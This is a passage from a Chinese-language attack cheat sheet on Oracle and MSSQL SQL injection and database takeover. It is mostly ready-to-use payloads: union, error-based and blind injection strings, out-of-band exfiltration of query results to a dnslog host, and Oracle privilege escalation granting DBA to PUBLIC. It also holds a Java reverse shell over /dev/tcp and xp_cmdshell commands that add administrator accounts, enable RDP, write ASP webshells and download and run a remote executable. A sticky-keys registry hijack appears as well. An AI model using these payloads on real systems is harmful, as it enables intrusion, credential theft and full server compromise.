table_name<>'NEWS'),'3' from dual --+ # 获取字段名 ?id=-1 union select 1,(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),'3' from dual --+ ?id=-1 union select 1,(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1 and column_name<>'ID'),'3' from dual --+ # 获取数据 ?id=-1 union select 1,(select concat(concat(username,'~~'),password) from users where rownum=1),null from dual --+ 报错注入 在 oracle 注入时候出现了数据库报错信息，可以优先选择报错注入，使用报错的方式将查询数据的结果带出到错误页面中。 使用报错注入需要使用类似 1=[报错语句]，1>[报错语句]，使用比较运算符，这样的方式进行报错注入（MYSQL 仅使用函数报错即可），类似 mssql 报错注入的方式。 utl_inaddr.get_host_name () utl_inaddr.get_host_address 本意是获取 ip 地址，但是如果传递参数无法得到解析就会返回一个 oracle 错误并显示传递的参数。 我们传递的是一个 sql 语句所以返回的就是语句执行的结果。oracle 在启动之后，把一些系统变量都放置到一些特定的视图当中，可以利用这些视图获得想要的东西。 # 获取用户名 ?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select user from dual)%7c%7c'~') --+ # 获取表名 ?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') --+ # 获取字段名 ?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') --+ # 获取数据 ?id=1 and 1=utl_inaddr.get_host_name('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') --+ ctxsys.drithsx.sn () # 获取用户名 ?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select user from dual)%7c%7c'~') --+ # 获取表名 ?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') --+ # 获取字段名 ?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') --+ # 获取数据 ?id=1 and 1=ctxsys.drithsx.sn(1,'~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') --+ dbms_xdb_version.checkin () # 获取用户名 ?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+ # 获取表名 ?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+ # 获取字段名 ?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+ # 获取数据 ?id=1 and (select dbms_xdb_version.checkin('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+ dbms_xdb_version.makeversioned () # 获取用户名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+ # 获取表名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+ # 获取字段名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+ # 获取数据 http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.makeversioned('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+ dbms_xdb_version.uncheckout () # 获取用户名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+ # 获取表名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+ # 获取字段名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+ # 获取数据 http://hackrock.com:8080/oracle/?id=1 and (select dbms_xdb_version.uncheckout('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+ dbms_utility.sqlid_to_sqlhash () # 获取用户名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+ # 获取表名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+ # 获取字段名 http://hackrock.com:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+ # 获取数据 http://hackrock.com:8080/oracle/?id=1 and (select dbms_utility.sqlid_to_sqlhash('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+ ordsys.ord_dicom.getmappingxpath () # 获取用户名 http://hackrock.com:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select user from dual)%7c%7c'~') from dual) is not null --+ # 获取表名 http://hackrock.com:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'~') from dual) is not null --+ # 获取字段名 http://hackrock.com:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'~') from dual) is not null --+ # 获取数据 http://hackrock.com:8080/oracle/?id=1 and (select ordsys.ord_dicom.getmappingxpath('~'%7c%7c(select username from test.users where rownum=1)%7c%7c'~') from dual) is not null --+ XMLType () # 获取用户名 http://hackrock.com:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null --+ # 获取表名 http://hackrock.com:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7cchr(62))) from dual) is not null --+ # 获取字段名 http://hackrock.com:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7cchr(62))) from dual) is not null --+ # 获取数据 http://hackrock.com:8080/oracle/?id=1 and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select username from test.users where rownum=1)%7c%7cchr(62))) from dual) is not null --+ 布尔型盲注 decode() decode(字段或字段的运算，值1，值2，值3） 这个函数运行的结果是，当字段或字段的运算的值等于值 1 时，该函数返回值 2，否则返回值3，当然值 1，值 2，值 3 也可以是表达式，这个函数使得某些 sql 语句简单了许多 # 判断是否是TEST用户 ?id=1 and 1=(select decode(user,'TEST',1,0) from dual) --+ # 猜解当前用户 ?id=1 and 1=(select decode(substr((select user from dual),1,1),'a',1,0) from dual) --+ # 猜解表名 ?id=1 and 1=(select decode(substr((select table_name from all_tables where rownum=1 and owner='TEST'),1,1),'N',1,0) from dual) --+ # 猜解字段名 ?id=1 and 1=(select decode(substr((select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),1,1),'I',1,0) from dual) --+ # 猜解数据 ?id=1 and 1=(select decode(substr((select username from test.users where rownum=1),1,1),'a',1,0) from dual) --+ instr () instr 函数的使用，从一个字符串中查找指定子串的位置 select instr('123456789','12') position from dual; 可以使用该函数按位爆破，该函数返回是从1开始 ?id=1 and (instr((select user from dual),'S'))=1 --+ ?id=1 and (instr((select user from dual),'SY'))=1 --+ ?id=1 and (instr((select user from dual),'SYS'))=1 --+ substr() 这个就和mysql 基本一致 # 猜解数据长度 ?id=1 and (select length(user) from dual)=3 --+ # ASCII按位爆破 ?id=1 and (select ascii(substr(user,1,1))from dual)=65 --+ 时间盲注 dbms_pipe.receive_message () DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒，但使用该函数存在许多限制。 首先，不能直接将该函数注入子查询中，因为 Oracle 不支持堆叠查询 (stacked query)。其次，只有数据库管理员才能使用 DBMS_LOCK 包。 在 Oracle PL/SQL 中有一种更好的办法，可以使用下面的指令以内联方式注入延迟： dbms_pipe.receive_message('RDS', 10) DBMS_PIPE.RECEIVE_MESSAGE() 函数将为从 RDS 管道返回的数据等待 10 秒。默认情况下，允许以 public 权限执行该包。DBMS_LOCK.SLEEP()与之相反，它是一个可以用在 SQL 语句中的函数。 # 查看是否可以使用 dbms_pipe.receive_message () 函数进行延时注入 ?id=1 and 1=(dbms_pipe.receive_message('RDS',5)) --+ # 猜解当前用户 ?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(user as varchar(4000)),chr(32)) from dual),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+ # 猜解表名 ?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(table_name as varchar(4000)),chr(32)) from all_tables where rownum=1 and owner='TEST'),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+ # 猜解字段 ?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(column_name as varchar(4000)),chr(32)) from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+ # 猜解数据 ?id=1 and 7238=(case when (ascii(substrc((select nvl(cast(username as varchar(4000)),chr(32)) from test.users where rownum=1),1,1)) > 65) then dbms_pipe.receive_message(chr(32)%7c%7cchr(106)%7c%7cchr(72)%7c%7cchr(73),5) else 7238 end) --+ decode () 原理：结合耗费时间的查询语句,不过在使用的过程中有很多不尽如人意的地方，有时候加载快有时加载慢。 ?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) --+ decode () 与 dbms_pipe.receive_message () 嵌套时间盲注 ?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS', 5),0) from dual) --+ DNS外带注入 Oracle 注入之带外通信和 DNSLOG 注入非常相似，例如和 mysql 中 load_file () 函数实现无回显注入非常相似。 Oracle 发送 HTTP 和 DNS 请求，并将查询结果带到请求中，然后检测外网服务器的 HTTP 和 DNS 日志，从日志中获取查询结果，通过这种方式将繁琐的盲注转换成可以直接获取查询结果的方式。 使用第三方平台，监听访问请求，并记录请求的日志信息，然后使用 utl_http.request() 向外网主机发送 http 请求，请求便携带了查询的结果信息。此处可以结合 SSRF 进行内网探测。或许这就是 Oracle 的 SSRF。 利用 utl.inaddr.get_host_address()，将查询结果拼接到域名下，并使用 DNS 记录解析日志，通过这种方式获取查询结果。 # 检测是否支持 utl_http.request ?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --+ # 获取用户名 ?id=1 and utl_http.request('http://'%7c%7c(select user from dual)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+ # 获取表名 ?id=1 and utl_http.request('http://'%7c%7c(select table_name from all_tables where rownum=1 and owner='TEST')%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+ # 获取列名 ?id=1 and utl_http.request('http://'%7c%7c(select column_name from all_tab_columns where owner='TEST' and table_name='USERS' and rownum=1)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+ # 获取数据 ?id=1 and utl_http.request('http://'%7c%7c(select username from test.users where rownum=1)%7c%7c'.z9mt3s.dnslog.cn/oracle')=1--+ 利用漏洞提权命令执行 dbms_export_extension() 影响版本：Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE (Fixed in CPU July 2006) 权限：None 详情：这个软件包有许多易受 PL/SQL 注入攻击的函数。这些函数由 SYS 拥有，作为 SYS 执行并且可由 PUBLIC 执行。因此，如果 SQL 注入处于上述任何未修补的 Oracle 数据库版本中，那么攻击者可以调用该函数并直接执行 SYS 查询。 提升权限 该请求将导致查询 "GRANT DBA TO PUBLIC" 以 SYS 身份执行。因为这个函数允许 PL / SQL 缺陷（PL / SQL 注入）。一旦这个请求成功执行，PUBLIC 获取 DBA 角色，从而提升当前 user 的特权 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual 使用Java执行 # 创建java库 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {publ # 赋予Java权限 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<>'''''''', '' # 创建函数 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java # 赋予函数执行权限 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual # 执行系统命令 select sys.LinxRunCMD('/bin/bash -c /usr/bin/whoami') from dual dbms_xmlquery.newcontext() 影响版本：Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE (Fixed in CPU July 2006) 必须在 DBMS_PORT_EXTENSION 存在漏洞情况下，否则赋予权限时无法成功 # 创建java库 select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedRe # 赋予当前用户Java权限 select user from dual select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''YY'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<>'''''''', '''''' # 查看 all_objects 内部改变 select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%' # 创建函数 select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual; # 判断是否创建成功 select OBJECT_ID from all_objects where object_name ='LINXRUNCMD' # 执行命令 select LinxRunCMD('id') from dual # 删除函数 drop function LinxRunCMD dbms_java_test.funcall() 影响版本：10g R2, 11g R1, 11g R2 权限：Java Permissions Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','pwd > /tmp/pwd.txt') from dual; 执行会有一定报错，但是不影响命令执行 Java反弹shell # linux系统payload import java.io.*; import java.net.*; public class shellRev {        public static void main(String[] args)       {                System.out.println(1);                try{run();}                catch(Exception e){}       } public static void run() throws Exception       {                String[] aaa={"/bin/bash","-c","exec 9<> /dev/tcp/192.168.1.50/8080;exec 0<&9;exec 1>&9 2>&1;/bin/sh"};                Process p=Runtime.getRuntime().exec(aaa);   } } #编译 javac shellRev.java #执行 java shellRev # 创建 Java 库 select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class sh end

MSSQL GetShell 扩展存储过程 扩展存储简介 在MSSQL注入攻击过程中，最长利用的扩展存储如下 xp_cmdshell详细使用方法： xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止 。如果用户拥有管理员sysadmin 权限则可以用sp_configure重新开启它 execute('sp_configure "show advanced options",1')  # 将该选项的值设置为1 execute('reconfigure')                             # 保存设置 execute('sp_configure "xp_cmdshell", 1')           # 将xp_cmdshell的值设置为1 execute('reconfigure')                             # 保存设置 execute('sp_configure')                            # 查看配置 execute('xp_cmdshell "whoami"')                    # 执行系统命令 exec sp_configure 'show advanced options',1;       # 将该选项的值设置为1 reconfigure;                                       # 保存设置 exec sp_configure 'xp_cmdshell',1;                 # 将xp_cmdshell的值设置为1 reconfigure;                                       # 保存设置 exec sp_configure;                                 # 查看配置 exec xp_cmdshell 'whoami';                         # 执行系统命令 # 可以执行系统权限之后,前提是获取的主机权限是administrators组里的或者system权限 exec xp_cmdshell 'net user Guest 123456'           # 给guest用户设置密码 exec xp_cmdshell 'net user Guest /active:yes'      # 激活guest用户 exec xp_cmdshell 'net localgroup administrators Guest /add'  # 将guest用户添加到administrators用户组 exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'  # 开启3389端口 扩展存储Getshell 条件 数据库是 db_owner 权限 扩展存储必须开启，涉及到的的扩展存储过程: xp_cmdshell、 xp_dirtree、 xp_subdirs、 xp_regread 1.查看是否禁用扩展存储过程xp_cmdshell id=0 union select 1,2,count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'--+ id=1 and 1=(select count(*) from master.sys.sysobjects where name='xp_cmdshell')--+ 2.执行命令 id=1;exec master.sys.xp_cmdshell 'net user admin Admin@123 /add'--+ id=1;exec master.sys.xp_cmdshell 'net localgroup administrators admin /add'--+ 差异备份GetShell 差异备份简介 差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限，我们可以把数据库备份称asp文件，这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。 前提条件 具有db_owner权限 知道web目录的绝对路径 寻找绝对路径的方法 报错信息 字典爆破 根据旁站目录进行推测 存储过程来搜索 在mssql中有两个存储过程可以帮我们来找绝对路径：xp_cmdshell xp_dirtree 先来看xp_dirtree直接举例子 execute master..xp_dirtree 'c:' --列出所有c:\文件、目录、子目录 execute master..xp_dirtree 'c:',1 --只列c:\目录 execute master..xp_dirtree 'c:',1,1 --列c:\目录、文件 当实际利用的时候我们可以创建一个临时表把存储过程查询到的路径插入到临时表中 CREATE TABLE tmp (dir varchar(8000),num int,num1 int); insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1; 当利用xp_cmdshell时，其实就是调用系统命令来寻找文件 例如： ?id=1;CREATE TABLE cmdtmp (dir varchar(8000)); ?id=1;insert into cmdtmp(dir) exec master..xp_cmdshell 'for /r c:\ %i in (1*.aspx) do @echo %i' 读配置文件 差异备份的大概流程 1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = 'c:\ddd.bak';--+ **2.创建表并插入数据** create table [dbo].[dtest] ([cmd] [image]);--+ insert into dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--+ **3.进行差异备份** backup database 库名 to disk='c:\interub\wwwroot\shell.asp' WITH DIFFERENTIAL,FORMAT;--+ # 上面0x3C25657865637574652872657175657374282261222929253E即一句话木马的内容：<%execute(request("a"))%> xp_cmdshell GetShell 原理很简单，就是利用系统命令直接像目标网站写入木马 ?id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\404.aspx' ; 这里要注意 <和>必须要转义，转义不是使用\而是使用^ 文件下载getshell 当我们不知道一些网站绝对路径时，我们可以通过文件下载命令，加载远程的木马文件，或者说.ps1脚本，使目标机器成功上线cs或者msf MSSQL提权 存储过程说明 xp_dirtree 用于显示当前目录的子目录，有如下三个参数   directory：表示要查询的目录   depath：要显示子目录的深度，默认值是0，表示所有的子目录   file：第三个参数，布尔类型，指定是否显示子目录中的文件，默认值是0，标水不显示任何文件，只显示子目录 xp_dirtree 能够触发NTLM请求xp_dirtree '\\<attacker_IP>\any\thing' xp_subdirs 用于得到给定的文件夹内的文件夹列表 exec xp_subdirs 'c:\' xp_fixeddrives 用于查看磁盘驱动器剩余的空间 exec xp_fixeddrives xp_availablemedia 用于获得当前所有的驱动器 exec xp_availablemedia xp_fileexist 用于判断文件是否存在 exec xp_fileexist 'c:\windows\123.txt' xp_create_subdir 用于创建子目录，参数是子目录的路径 exec xp_create_subdir 'c:\users\admin\desktop\test' xp_delete_file 可用于删除文件，但是不会删除任意类型的文件，系统限制它只能删除特定类型（备份文件和报表文件） 第一个参数是文件类型（File Type），有效值是0和1，0是指备份文件，1是指报表文件； 第二个参数是目录路径（Folder Path）， 目录中的文件会被删除，目录路径必须以“\”结尾； 第三个参数是文件的扩展名（File Extension），常用的扩展名是'BAK' 或'TRN'； 第四个参数是Date，早于该日期创建的文件将会被删除； 第五个参数是子目录（Subfolder），bool类型，0是指忽略子目录，1是指将会删除子目录中的文件； xp_regenumkeys 可以查看指定的注册表 exec xp_regenumkeys 'HKEY_CURRENT_USER','Control Panel\International' xp_regdeletekey 删除指定的注册表键值 EXEC xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'; xp_regwrite 描述： 修改注册表 利用条件： xpstar.dll 修改注册表来劫持粘贴键(映像劫持) (测试结果 Access is denied，没有权限) exec master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe' sp_addextendedproc 可以用于恢复组件 EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll' EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll' EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll' sp_dropextendedproc 用于删除扩展存储过程 exec sp_dropextendedproc 'xp_cmdshell' xp_cmdshell 描述： xp_cmdshell 是 Sql Server 中的一个组件，我们可以用它来执行系统命令。 利用条件： 拥有 DBA 权限, 在 2005 中 xp_cmdshell 的权限是 system，2008 中是 network。 依赖 xplog70.dll -- 判断当前是否为DBA权限，为1则可以提权 select is_srvrolemember('sysadmin'); -- 查看是否存在 xp_cmdshell EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- 查看能否使用 xp_cmdshell，从MSSQL2005版本之后默认关闭 select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell' -- 关闭 xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE; -- 开启 xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; -- 执行 xp_cmdshell exec xp_cmdshell 'cmd /c whoami' -- xp_cmdshell 调用cmd.exe用powershell 远程下载exe并执行 exec xp_cmdshell '"echo $client = New-Object System.Net.WebClient > %TEMP%\test.ps1 & echo $client.DownloadFile("http://example/test0.exe","%TEMP%\test.exe") >> %TEMP%\test.ps1 & powershell -ExecutionPolicy Bypass %temp%\test.ps1 & WMIC process call create "%TEMP%\test.exe""' 无回显，也无法进行dnslog怎么办： 通过临时表查看命令执行结果（在注入时，要能堆叠） CREATE TABLE tmpTable (tmp1 varchar(8000)); insert into tmpTable(tmp1) exec xp_cmdshell 'ipconfig' select * from tmpTable 如果 xp_cmdshell 被删除了: 如果 xp_cmdshell 被删除了，需要重新恢复或自己上传 xplog70.dll 进行恢复 以mssql2012为例，默认路径为: C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\xplog70.dll-- 判断存储扩展是否存在,返回结果为1就OK Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' -- 恢复xp_cmdshell,返回结果为1就OK Exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' -- 否则上传xplog70.dll Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll' sp_oacreate 描述： 使用sp_oacreate的提权语句，主要是用来调用OLE对象（Object Linking and Embedding的缩写，VB中的OLE对象），利用OLE对象的run方法执行系统命令。 利用条件： 拥有DBA权限 依赖odsole70.dll -- 判断当前是否为DBA权限，为1则可以提权 select is_srvrolemember('sysadmin'); -- 判断SP_OACREATE状态,如果存在返回1 select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE' -- 启用 sp_oacreate exec sp_configure 'show advanced options',1; reconfigure; exec sp_configure 'Ole Automation Procedures', 1; reconfigure; -- wscript.shell组件执行系统命令 declare @ffffffff0x int,@exec int,@text int,@str varchar(8000) exec sp_oacreate 'wscript.shell',@ffffffff0x output exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami' exec sp_oamethod @exec, 'StdOut', @text out exec sp_oamethod @text, 'readall', @str out select @str; -- 输出执行结果到指定文件 declare @ffffffff0x int exec sp_oacreate 'wscript.shell',@ffffffff0x output exec sp_oamethod @ffffffff0x,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\www\\1.txt' -- 利用com组件执行命令 declare @ffffffff0x int,@exec int,@text int,@str varchar(8000) exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@ffffffff0x output exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami' exec sp_oamethod @exec, 'StdOut', @text out exec sp_oamethod @text, 'readall', @str out select @str; -- 利用com组件写文件 DECLARE @ObjectToken INT; EXEC Sp_OACreate '{00000566-0000-0010-8000-00AA006D2EA4}',@ObjectToken OUTPUT; EXEC Sp_OASetProperty @ObjectToken, 'Type', 1; EXEC sp_oamethod @ObjectToken, 'Open'; EXEC sp_oamethod @ObjectToken, 'Write', NULL, 0x66666666666666663078; EXEC sp_oamethod @ObjectToken, 'SaveToFile', NULL,'ffffffff0x.txt',2; EXEC sp_oamethod @ObjectToken, 'Close'; EXEC sp_OADestroy @ObjectToken; -- 利用filesystemobject写vb脚本 （目录必须存在，否则也会显示成功，但是没有文件写入） declare @o int, @f int, @t int, @ret int,@a int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o,'createtextfile', @f out, 'c:\\www\\ffffffff0x.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, 'hahahahahahhahahah'declare @o int, @f int, @t int, @ret int,@a int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o,'createtextfile', @f out, 'c:\\www\\ffffffff0x.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, 'hahahahahahhahahah(这里是文件写入的内容)' -- 配合 wscript.shell 组件执行 DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out 